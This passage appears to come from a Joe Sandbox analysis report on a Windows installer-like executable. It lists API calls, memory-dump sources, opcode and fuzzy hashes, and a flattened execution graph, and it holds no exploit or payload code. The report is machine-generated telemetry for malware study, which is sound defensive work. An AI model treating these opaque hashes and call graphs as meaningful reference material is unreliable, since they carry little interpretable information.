                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0066ADB0,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,0066ADB0,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0066BDB0,?,00000000,00008000,0066ADB0,00000000,00401AB4), ref: 00401A79
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3782394904-0
• Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
• Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000$9@
• API String ID: 1220098344-1503883590
• Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
• Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
• Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
• Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
• Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: QueryValue
• String ID: )q@
• API String ID: 3660427363-2284170586
• Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
• Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
• Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
• Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
Strings
• Setup, xrefs: 00409CAD
• The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Message
• String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
• API String ID: 2030045667-3271211647
• Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
• Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
• Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
• Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
• GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CommandHandleLineModule
• String ID: U1hd.@
• API String ID: 2123368496-2904493091
• Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
• Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                  • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                                                                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:16%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:4.8%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:102
                                                                                                                                                                                                                                  execution_graph 49941 40cd00 49942 40cd12 49941->49942 49943 40cd0d 49941->49943 49945 406f48 CloseHandle 49943->49945 49945->49942 49946 492848 49947 49287c 49946->49947 49948 49287e 49947->49948 49949 492892 49947->49949 50092 446f9c 32 API calls 49948->50092 49952 4928ce 49949->49952 49953 4928a1 49949->49953 49951 492887 Sleep 50045 492905 49951->50045 49958 49290a 49952->49958 49959 4928dd 49952->49959 49955 446ff8 32 API calls 49953->49955 49957 4928b0 49955->49957 49961 4928b8 FindWindowA 49957->49961 49964 492919 49958->49964 49965 492960 49958->49965 50082 446ff8 49959->50082 49963 447278 19 API calls 49961->49963 49962 4928ea 49966 4928f2 FindWindowA 49962->49966 50032 4928c9 49963->50032 50093 446f9c 32 API calls 49964->50093 49970 4929bc 49965->49970 49971 49296f 49965->49971 50086 447278 49966->50086 49969 492925 50094 446f9c 32 API calls 49969->50094 49977 492a18 49970->49977 49978 4929cb 49970->49978 50097 446f9c 32 API calls 49971->50097 49974 492932 50095 446f9c 32 API calls 49974->50095 49975 49297b 50098 446f9c 32 API calls 49975->50098 49988 492a52 49977->49988 49989 492a27 49977->49989 50102 446f9c 32 API calls 49978->50102 49980 49293f 50096 446f9c 32 API calls 49980->50096 49983 492988 50099 446f9c 32 API calls 49983->50099 49984 49294a SendMessageA 49987 447278 19 API calls 49984->49987 49985 4929d7 50103 446f9c 32 API calls 49985->50103 49987->50032 50000 492a61 49988->50000 50001 492aa0 49988->50001 49992 446ff8 32 API calls 49989->49992 49991 492995 50100 446f9c 32 API calls 49991->50100 49995 492a34 49992->49995 49993 4929e4 50104 446f9c 32 API calls 49993->50104 50002 492a3c RegisterClipboardFormatA 49995->50002 49997 4929a0 PostMessageA 50101 4470d0 19 API calls 49997->50101 49999 4929f1 50105 446f9c 32 API calls 
49999->50105 50107 446f9c 32 API calls 50000->50107 50009 492aaf 50001->50009 50010 492af4 50001->50010 50005 447278 19 API calls 50002->50005 50005->50045 50006 4929fc SendNotifyMessageA 50106 4470d0 19 API calls 50006->50106 50007 492a6d 50108 446f9c 32 API calls 50007->50108 50110 446f9c 32 API calls 50009->50110 50017 492b48 50010->50017 50018 492b03 50010->50018 50012 492a7a 50109 446f9c 32 API calls 50012->50109 50015 492abb 50111 446f9c 32 API calls 50015->50111 50016 492a85 SendMessageA 50020 447278 19 API calls 50016->50020 50025 492b57 50017->50025 50031 492baa 50017->50031 50114 446f9c 32 API calls 50018->50114 50020->50032 50022 492ac8 50112 446f9c 32 API calls 50022->50112 50023 492b0f 50115 446f9c 32 API calls 50023->50115 50029 446ff8 32 API calls 50025->50029 50027 492ad3 PostMessageA 50113 4470d0 19 API calls 50027->50113 50033 492b64 50029->50033 50030 492b1c 50116 446f9c 32 API calls 50030->50116 50035 492bb9 50031->50035 50036 492c31 50031->50036 50032->50045 50118 42e394 SetErrorMode 50033->50118 50039 446ff8 32 API calls 50035->50039 50047 492c40 50036->50047 50048 492c66 50036->50048 50038 492b27 SendNotifyMessageA 50117 4470d0 19 API calls 50038->50117 50042 492bc8 50039->50042 50040 492b71 50043 492b87 GetLastError 50040->50043 50044 492b77 50040->50044 50121 446f9c 32 API calls 50042->50121 50049 447278 19 API calls 50043->50049 50046 447278 19 API calls 50044->50046 50132 403420 50045->50132 50050 492b85 50046->50050 50126 446f9c 32 API calls 50047->50126 50055 492c98 50048->50055 50056 492c75 50048->50056 50049->50050 50054 447278 19 API calls 50050->50054 50053 492c4a FreeLibrary 50127 4470d0 19 API calls 50053->50127 50054->50045 50065 492ca7 50055->50065 50071 492cdb 50055->50071 50059 446ff8 32 API calls 50056->50059 50057 492bdb GetProcAddress 50060 492c21 50057->50060 50061 492be7 50057->50061 50062 492c81 50059->50062 50125 4470d0 19 API calls 50060->50125 50122 446f9c 32 API calls 50061->50122 50067 492c89 CreateMutexA 
50062->50067 50128 48ccc8 32 API calls 50065->50128 50066 492bf3 50123 446f9c 32 API calls 50066->50123 50067->50045 50070 492c00 50074 447278 19 API calls 50070->50074 50071->50045 50130 48ccc8 32 API calls 50071->50130 50073 492cb3 50076 492cc4 OemToCharBuffA 50073->50076 50075 492c11 50074->50075 50124 4470d0 19 API calls 50075->50124 50129 48cce0 19 API calls 50076->50129 50079 492cf6 50080 492d07 CharToOemBuffA 50079->50080 50131 48cce0 19 API calls 50080->50131 50083 447000 50082->50083 50136 436078 50083->50136 50085 44701f 50085->49962 50087 447280 50086->50087 50249 4363e0 VariantClear 50087->50249 50089 4472ba 50089->50045 50090 4472a3 50090->50089 50250 408c0c 18 API calls 50090->50250 50092->49951 50093->49969 50094->49974 50095->49980 50096->49984 50097->49975 50098->49983 50099->49991 50100->49997 50101->50032 50102->49985 50103->49993 50104->49999 50105->50006 50106->50045 50107->50007 50108->50012 50109->50016 50110->50015 50111->50022 50112->50027 50113->50032 50114->50023 50115->50030 50116->50038 50117->50045 50251 403738 50118->50251 50121->50057 50122->50066 50123->50070 50124->50032 50125->50032 50126->50053 50127->50045 50128->50073 50129->50045 50130->50079 50131->50045 50134 403426 50132->50134 50133 40344b 50134->50133 50135 402660 4 API calls 50134->50135 50135->50134 50137 436084 50136->50137 50147 4360a6 50136->50147 50137->50147 50156 408c0c 18 API calls 50137->50156 50138 436129 50165 408c0c 18 API calls 50138->50165 50140 436111 50160 403494 50140->50160 50141 436105 50141->50085 50142 4360f9 50151 403510 18 API calls 50142->50151 50143 4360ed 50157 403510 50143->50157 50144 43611d 50164 4040e8 32 API calls 50144->50164 50147->50138 50147->50140 50147->50141 50147->50142 50147->50143 50147->50144 50150 43613a 50150->50085 50155 436102 50151->50155 50153 436126 50153->50085 50155->50085 50156->50147 50166 4034e0 50157->50166 50162 403498 50160->50162 50161 4034ba 50161->50085 50162->50161 50163 402660 4 API calls 50162->50163 
50163->50161 50164->50153 50165->50150 50171 4034bc 50166->50171 50168 4034f0 50176 403400 50168->50176 50172 4034c0 50171->50172 50173 4034dc 50171->50173 50180 402648 50172->50180 50173->50168 50175 4034c9 50175->50168 50177 403406 50176->50177 50178 40341f 50176->50178 50177->50178 50244 402660 50177->50244 50178->50085 50181 40264c 50180->50181 50183 402656 50180->50183 50186 402088 50181->50186 50182 402652 50182->50183 50197 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50182->50197 50183->50175 50183->50183 50187 40209c 50186->50187 50188 4020a1 50186->50188 50198 4019cc RtlInitializeCriticalSection 50187->50198 50190 4020c6 RtlEnterCriticalSection 50188->50190 50191 4020d0 50188->50191 50192 4020a5 50188->50192 50190->50191 50191->50192 50205 401f94 50191->50205 50192->50182 50195 4021f1 RtlLeaveCriticalSection 50196 4021fb 50195->50196 50196->50182 50197->50183 50199 4019f0 RtlEnterCriticalSection 50198->50199 50200 4019fa 50198->50200 50199->50200 50201 401a18 LocalAlloc 50200->50201 50202 401a32 50201->50202 50203 401a81 50202->50203 50204 401a77 RtlLeaveCriticalSection 50202->50204 50203->50188 50204->50203 50206 401fa4 50205->50206 50207 401fd0 50206->50207 50210 401ff4 50206->50210 50211 401f0c 50206->50211 50207->50210 50216 401db4 50207->50216 50210->50195 50210->50196 50220 40178c 50211->50220 50215 401f29 50215->50206 50217 401e02 50216->50217 50218 401dd2 50216->50218 50217->50218 50231 401d1c 50217->50231 50218->50210 50223 4017a8 50220->50223 50221 4014e4 LocalAlloc VirtualAlloc VirtualFree 50221->50223 50222 4017b2 50224 401678 VirtualAlloc 50222->50224 50223->50221 50223->50222 50225 40180f 50223->50225 50226 4013e0 LocalAlloc 50223->50226 50227 401803 50223->50227 50228 4017be 50224->50228 50225->50215 50230 401e80 9 API calls 50225->50230 50226->50223 50229 4015c0 VirtualFree 50227->50229 50228->50225 50229->50225 50230->50215 50232 401d2e 50231->50232 50233 401d51 50232->50233 50234 401d63 50232->50234 50235 401940 LocalAlloc 
VirtualFree VirtualFree 50233->50235 50236 401940 LocalAlloc VirtualFree VirtualFree 50234->50236 50237 401d61 50235->50237 50236->50237 50238 401d79 50237->50238 50239 401bf8 9 API calls 50237->50239 50238->50218 50240 401d88 50239->50240 50241 401da2 50240->50241 50242 401c4c 9 API calls 50240->50242 50243 401454 LocalAlloc 50241->50243 50242->50241 50243->50238 50245 402664 50244->50245 50246 40266e 50244->50246 50245->50246 50248 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50245->50248 50246->50178 50246->50246 50248->50246 50249->50090 50250->50089 50252 40373c LoadLibraryA 50251->50252 50252->50040 54027 498ba8 54085 403344 54027->54085 54029 498bb6 54088 4056a0 54029->54088 54031 498bbb 54091 40631c GetModuleHandleA GetProcAddress 54031->54091 54035 498bc5 54099 40994c 54035->54099 54366 4032fc 54085->54366 54087 403349 GetModuleHandleA GetCommandLineA 54087->54029 54090 4056db 54088->54090 54367 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54088->54367 54090->54031 54092 406338 54091->54092 54093 40633f GetProcAddress 54091->54093 54092->54093 54094 406355 GetProcAddress 54093->54094 54095 40634e 54093->54095 54096 406364 SetProcessDEPPolicy 54094->54096 54097 406368 54094->54097 54095->54094 54096->54097 54098 4063c4 6F571CD0 54097->54098 54098->54035 54368 409024 54099->54368 54366->54087 54367->54090 54369 408cbc 19 API calls 54368->54369 54370 409035 54369->54370 54371 4085dc GetSystemDefaultLCID 54370->54371 54375 408612 54371->54375 54372 408568 19 API calls 54372->54375 54373 403450 18 API calls 54373->54375 54374 406dec 19 API calls 54374->54375 54375->54372 54375->54373 54375->54374 54376 408674 54375->54376 54377 403450 18 API calls 54376->54377 54378 406dec 19 API calls 54376->54378 54379 408568 19 API calls 54376->54379 54380 4086f7 54376->54380 54377->54376 54378->54376 54379->54376 54381 403420 4 API calls 54380->54381 54382 408711 54381->54382 54383 408720 GetSystemDefaultLCID 54382->54383 54440 408568 GetLocaleInfoA 
54383->54440 54386 403450 18 API calls 54387 408760 54386->54387 54388 408568 19 API calls 54387->54388 54389 408775 54388->54389 54390 408568 19 API calls 54389->54390 54391 408799 54390->54391 54446 4085b4 GetLocaleInfoA 54391->54446 54394 4085b4 GetLocaleInfoA 54395 4087c9 54394->54395 54396 408568 19 API calls 54395->54396 54397 4087e3 54396->54397 54398 4085b4 GetLocaleInfoA 54397->54398 54399 408800 54398->54399 54400 408568 19 API calls 54399->54400 54441 4085a1 54440->54441 54442 40858f 54440->54442 54443 403494 4 API calls 54441->54443 54444 4034e0 18 API calls 54442->54444 54445 40859f 54443->54445 54444->54445 54445->54386 54447 4085d0 54446->54447 54447->54394 55799 42f520 55800 42f52b 55799->55800 55801 42f52f NtdllDefWindowProc_A 55799->55801 55801->55800 50253 416b42 50254 416bea 50253->50254 50255 416b5a 50253->50255 50272 41531c 18 API calls 50254->50272 50257 416b74 SendMessageA 50255->50257 50258 416b68 50255->50258 50268 416bc8 50257->50268 50259 416b72 CallWindowProcA 50258->50259 50260 416b8e 50258->50260 50259->50268 50269 41a058 GetSysColor 50260->50269 50263 416b99 SetTextColor 50264 416bae 50263->50264 50270 41a058 GetSysColor 50264->50270 50266 416bb3 SetBkColor 50271 41a6e0 GetSysColor CreateBrushIndirect 50266->50271 50269->50263 50270->50266 50271->50268 50272->50268 55802 4358e0 55803 4358f5 55802->55803 55807 43590f 55803->55807 55808 4352c8 55803->55808 55813 435312 55808->55813 55819 4352f8 55808->55819 55809 403400 4 API calls 55810 435717 55809->55810 55810->55807 55821 435728 18 API calls 55810->55821 55811 446da4 18 API calls 55811->55819 55812 402648 18 API calls 55812->55819 55813->55809 55815 431ca0 18 API calls 55815->55819 55816 403450 18 API calls 55816->55819 55817 403744 18 API calls 55817->55819 55818 4038a4 18 API calls 55818->55819 55819->55811 55819->55812 55819->55813 55819->55815 55819->55816 55819->55817 55819->55818 55822 4343b0 55819->55822 55834 434b74 18 API calls 55819->55834 55821->55807 55823 43446d 
55822->55823 55824 4343dd 55822->55824 55853 434310 18 API calls 55823->55853 55825 403494 4 API calls 55824->55825 55827 4343eb 55825->55827 55829 403778 18 API calls 55827->55829 55828 403400 4 API calls 55830 4344bd 55828->55830 55832 43440c 55829->55832 55830->55819 55831 43445f 55831->55828 55832->55831 55835 494944 55832->55835 55834->55819 55836 49497c 55835->55836 55837 494a14 55835->55837 55838 403494 4 API calls 55836->55838 55854 448930 55837->55854 55842 494987 55838->55842 55840 494997 55841 403400 4 API calls 55840->55841 55843 494a38 55841->55843 55842->55840 55844 4037b8 18 API calls 55842->55844 55845 403400 4 API calls 55843->55845 55847 4949b0 55844->55847 55846 494a40 55845->55846 55846->55832 55847->55840 55848 4037b8 18 API calls 55847->55848 55849 4949d3 55848->55849 55850 403778 18 API calls 55849->55850 55851 494a04 55850->55851 55852 403634 18 API calls 55851->55852 55852->55837 55853->55831 55855 448955 55854->55855 55856 448998 55854->55856 55857 403494 4 API calls 55855->55857 55858 4489ac 55856->55858 55866 44852c 55856->55866 55859 448960 55857->55859 55861 403400 4 API calls 55858->55861 55863 4037b8 18 API calls 55859->55863 55862 4489df 55861->55862 55862->55840 55864 44897c 55863->55864 55865 4037b8 18 API calls 55864->55865 55865->55856 55867 403494 4 API calls 55866->55867 55868 448562 55867->55868 55869 4037b8 18 API calls 55868->55869 55870 448574 55869->55870 55871 403778 18 API calls 55870->55871 55872 448595 55871->55872 55873 4037b8 18 API calls 55872->55873 55874 4485ad 55873->55874 55875 403778 18 API calls 55874->55875 55876 4485d8 55875->55876 55877 4037b8 18 API calls 55876->55877 55886 4485f0 55877->55886 55878 448628 55880 403420 4 API calls 55878->55880 55879 4486c3 55884 4486cb GetProcAddress 55879->55884 55881 448708 55880->55881 55881->55858 55882 44864b LoadLibraryExA 55882->55886 55883 44865d LoadLibraryA 55883->55886 55885 4486de 55884->55885 55885->55878 55886->55878 55886->55879 55886->55882 55886->55883 
55887 403b80 18 API calls 55886->55887 55888 403450 18 API calls 55886->55888 55890 43da88 18 API calls 55886->55890 55887->55886 55888->55886 55890->55886 50273 416644 50274 416651 50273->50274 50275 4166ab 50273->50275 50280 416550 CreateWindowExA 50274->50280 50276 416658 SetPropA SetPropA 50276->50275 50277 41668b 50276->50277 50278 41669e SetWindowPos 50277->50278 50278->50275 50280->50276 55891 4222e4 55892 4222f3 55891->55892 55897 421274 55892->55897 55895 422313 55898 4212e3 55897->55898 55911 421283 55897->55911 55901 4212f4 55898->55901 55922 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55898->55922 55900 421322 55903 421395 55900->55903 55908 42133d 55900->55908 55901->55900 55902 4213ba 55901->55902 55905 4213ce SetMenu 55902->55905 55919 421393 55902->55919 55910 4213a9 55903->55910 55903->55919 55904 4213e6 55925 4211bc 24 API calls 55904->55925 55905->55919 55914 421360 GetMenu 55908->55914 55908->55919 55909 4213ed 55909->55895 55920 4221e8 10 API calls 55909->55920 55913 4213b2 SetMenu 55910->55913 55911->55898 55921 408d2c 33 API calls 55911->55921 55913->55919 55915 421383 55914->55915 55916 42136a 55914->55916 55923 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55915->55923 55918 42137d SetMenu 55916->55918 55918->55915 55919->55904 55924 421e2c 25 API calls 55919->55924 55920->55895 55921->55911 55922->55901 55923->55919 55924->55904 55925->55909 55926 44b4a8 55927 44b4b6 55926->55927 55929 44b4d5 55926->55929 55928 44b38c 25 API calls 55927->55928 55927->55929 55928->55929 55930 448728 55931 448756 55930->55931 55932 44875d 55930->55932 55934 403400 4 API calls 55931->55934 55933 448771 55932->55933 55935 44852c 21 API calls 55932->55935 55933->55931 55936 403494 4 API calls 55933->55936 55937 448907 55934->55937 55935->55933 55938 44878a 55936->55938 55939 4037b8 18 API calls 55938->55939 55940 4487a6 55939->55940 55941 4037b8 18 API calls 55940->55941 55942 4487c2 55941->55942 55942->55931 55943 4487d6 55942->55943 55944 4037b8 
18 API calls 55943->55944 55945 4487f0 55944->55945 55946 431bd0 18 API calls 55945->55946 55947 448812 55946->55947 55948 431ca0 18 API calls 55947->55948 55955 448832 55947->55955 55948->55947 55949 448888 55962 442334 55949->55962 55950 448870 55950->55949 55974 4435d0 18 API calls 55950->55974 55954 4488bc GetLastError 55975 4484c0 18 API calls 55954->55975 55955->55950 55973 4435d0 18 API calls 55955->55973 55957 4488cb 55976 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55957->55976 55959 4488e0 55977 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55959->55977 55961 4488e8 55963 443312 55962->55963 55964 44236d 55962->55964 55966 403400 4 API calls 55963->55966 55965 403400 4 API calls 55964->55965 55967 442375 55965->55967 55968 443327 55966->55968 55969 431bd0 18 API calls 55967->55969 55968->55954 55970 442381 55969->55970 55971 443302 55970->55971 55978 441a0c 18 API calls 55970->55978 55971->55954 55973->55955 55974->55949 55975->55957 55976->55959 55977->55961 55978->55970 55979 4165ec DestroyWindow 55980 42e3ef SetErrorMode 50281 441394 50282 44139d 50281->50282 50283 4413ab CreateFileA 50281->50283 50282->50283 50284 4413b6 50283->50284 55981 491bf8 55982 491c32 55981->55982 55983 491c34 55982->55983 55986 491c3e 55982->55986 56176 409098 MessageBeep 55983->56176 55985 491c39 55989 403420 4 API calls 55985->55989 55987 491c4d 55986->55987 55988 491c76 55986->55988 55990 446ff8 32 API calls 55987->55990 55993 491cae 55988->55993 55994 491c85 55988->55994 55991 49228a 55989->55991 55992 491c5a 55990->55992 55995 403400 4 API calls 55991->55995 56177 406bb0 55992->56177 56003 491cbd 55993->56003 56004 491ce6 55993->56004 55997 446ff8 32 API calls 55994->55997 55998 492292 55995->55998 56000 491c92 55997->56000 56185 406c00 18 API 